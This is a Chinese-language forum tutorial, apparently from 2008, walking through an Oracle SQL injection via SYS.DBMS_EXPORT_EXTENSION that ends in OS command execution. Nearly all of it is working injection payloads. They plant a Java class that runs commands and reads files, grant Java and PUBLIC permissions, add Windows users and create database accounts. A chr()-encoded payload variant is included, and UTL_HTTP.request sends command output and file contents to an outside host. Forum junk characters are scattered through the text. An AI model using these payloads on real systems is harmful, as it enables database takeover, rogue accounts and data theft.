实例演示oracle注入获取cmdshell的全过程

admin

以下的演示都是在web上的sql plus执行的，在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成

　　/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
$ }2 X6 @  U# B9 n的形式即可。(用" 'a'|| "是为了让语句返回true值)
+ s0 [/ \# L4 O' d0 _; s# c, J语句有点长，可能要用post提交。
; I' V1 U" B" A+ R& g! b. s' @以下是各个步骤：
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数，在oracle上创建Java包LinxUtil，里面两个函数，runCMD用于执行系统命令，readFile用于读取文件：
/xxx.jsp?id=1 and '1'<>'a'||(
5 W3 j' H# }9 c. o6 Yselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
$ Y  `4 v% r- rcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
- A# H' I: [* E+ [0 m' mnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
: I, u; R- g# J, K! [)
5 {) I' G8 `7 R0 x2 T0 q9 a------------------------
0 O. N' P9 G8 Y, _; s* b如果url有长度限制，可以把readFile()函数块去掉，即：
/xxx.jsp?id=1 and '1'<>'a'||(
, t* {7 r' ?: @; u3 cselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
8 ~- O) }8 B5 D9 _8 ]* H3 J8 ?}'''';END;'';END;--','SYS',0,'1',0) from dual
: E" O/ _  y( j$ d& l. H)
0 w% W. f0 P) E- p同时把后面步骤 提到的 对readFile()的处理语句去掉。
# I/ E- T7 e2 w- ?# V% N5 j% R7 S) R------------------------------
3 H' c+ Z( q* I& J( m2.赋Java权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
/ t; _: H% D0 u7 u3 g/ b3.创建函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
4.赋public执行函数的权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
: i9 {2 ~: ]; W$ x5 y& nselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
) Y4 _3 l, J7 Y" w! v) p6 ^+ B% x5.测试上面的几步是否成功
and '1'<>'11'||(
" ?9 J" A/ R5 q/ Q' ?0 \0 ~% e- eselect  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
)
and '1'<>(
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
)
6.执行命令：
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
- _8 b( K6 H6 {8 {2 s- n7 [
9 [9 c9 w3 h' w; `( l)
* q% {0 G) D- l8 [/xxx.jsp?id=1 and '1'<>(
select  sys.LinxReadFile('c:/boot.ini') from dual

: G4 l7 O9 S. R0 {% _: R# O7 k)
　　
注意sys.LinxReadFile()返回的是varchar类型，不能用"and 1<>" 代替 "and '1'<>"。
8 g# e$ o0 a# N- G- Q8 n如果要查看运行结果可以用 union :
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
9 `; J' b. a; L) i2 ]" G$ d4 f或者UTL_HTTP.request(:
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
)
/xxx.jsp?id=1 and '1'<>(
+ [( Z1 \3 h% {3 ASELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
! J6 y5 L- H8 q)
3 B0 R* J! M5 L: O: {- N1 h- }$ a注意：用UTL_HTTP.request时，要用 REPLACE() 把空格、换行符给替换掉，否则会无法提交http request。用utl_encode.base64_encode也可以。
5 b4 C: N0 v  z--------------------
9 w( f: k( X! P, X) r6.内部变化
通过以下命令可以查看all_objects表达改变：
& ?! ^; K8 y' p6 i- zselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
. k5 U/ U0 b$ q0 G$ m7.删除我们创建的函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
4 z5 x1 M# k4 k, U3 H" N) [drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
( l* Q1 w, j9 A( [1 ~; ]====================================================
全文结束。谨以此文赠与我的朋友。
8 D- @  ~8 {0 t$ B! ^linx
124829445
$ R4 ], B1 @+ i& Y& k2008.1.12
& F; V8 ^) ^1 {& r# R5 X# h7 ilinyujian@bjfu.edu.cn
======================================================================
测试漏洞的另一方法：
7 R# X! \( Z; R3 k" n创建oracle帐号：
( i2 q9 d' z9 O$ Oselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
1 {$ u! s' V+ g" ^1 eCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
4 x; l9 V& J& J( Y% [即：
- N) t' p  K% R+ l4 a# i6 {/ \select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
2 v# O% v& n8 @0 f9 ]' ^chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
7 }( B( `$ z+ A$ U# G确定漏洞存在：
1<>(
select user_id from all_users where username='LINXSQL'
# |$ f8 i  [1 C)
给linxsql连接权限：
; J% J7 o3 n( d- X% {7 fselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
0 i0 q% Q, u6 W! g: wGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
( J' W6 c1 m! T, ~+ L删除帐号：
( H  {3 `6 D9 S" x& n0 k( _# zselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
0 T$ s/ z  i9 [( x/ _drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
) |5 S& [; \2 E! l2 G以下方法创建一个可以执行多语句的函数Linx_query()，执行成功的话返回数值"1"，但权限是继承的，可能仅仅是public权限，作用似乎不大，真的要用到话可以考虑grant dba to 当前的User：
$ N# }( g" X2 R8 }  M) R1.jsp?id=1 and '1'<>(
" x: H5 T' `8 V' Q& Aselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
% R; h! L% n* q5 U) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
　)
# |8 z- U$ e. Q% {
) E$ `9 d- H  q
3 Q( b; T5 [( n& q  a+ y: g% ^